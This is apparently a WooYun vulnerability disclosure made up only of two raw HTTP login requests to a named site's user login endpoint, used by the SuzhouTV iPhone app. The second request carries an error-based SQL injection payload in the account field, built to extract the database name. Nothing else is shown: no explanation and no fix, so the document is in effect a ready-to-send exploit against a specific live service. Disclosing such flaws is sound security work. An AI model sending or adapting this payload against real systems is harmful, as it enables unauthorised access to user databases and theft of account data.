WooYun.org

POST http://content.2500city.com/ucenter/user/login HTTP/1.1
Cookie: AD_RS_COOKIE=20110763
User-Agent: SuzhouTV/3.9.2 (iPhone; iOS 9.3.1; Scale/2.00)
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://content.2500city.com/ucenter/user/login
Host: content.2500city.com
Accept-Encoding: gzip,deflate
Accept: */*
{"account":"13888888888","password":"8abff0aa0877844584df31b9e4e45831","platform":1,"version":"3.9.2"}

POST http://content.2500city.com/ucenter/user/login HTTP/1.1
Content-Length: 315
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: content.2500city.com
Accept: */*
User-Agent: SuzhouTV/3.9.2 (iPhone; iOS 9.3.1; Scale/2.00)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
X-Requested-With: XMLHttpRequest
Pragma: no-cache
Cache-Control: no-cache,no-store
Referer: http://content.2500city.com/ucenter/user/login
Content-Type: application/x-www-form-urlencoded
Cookie: AD_RS_COOKIE=20110763
{"account":"13888888888' AND (SELECT 5906 FROM(SELECT COUNT(*),CONCAT(0x716b716a71,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x716a627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UBuc'='UBuc","password":"8abff0aa0877844584df31b9e4e45831","platform":1,"version":"3.9.2"}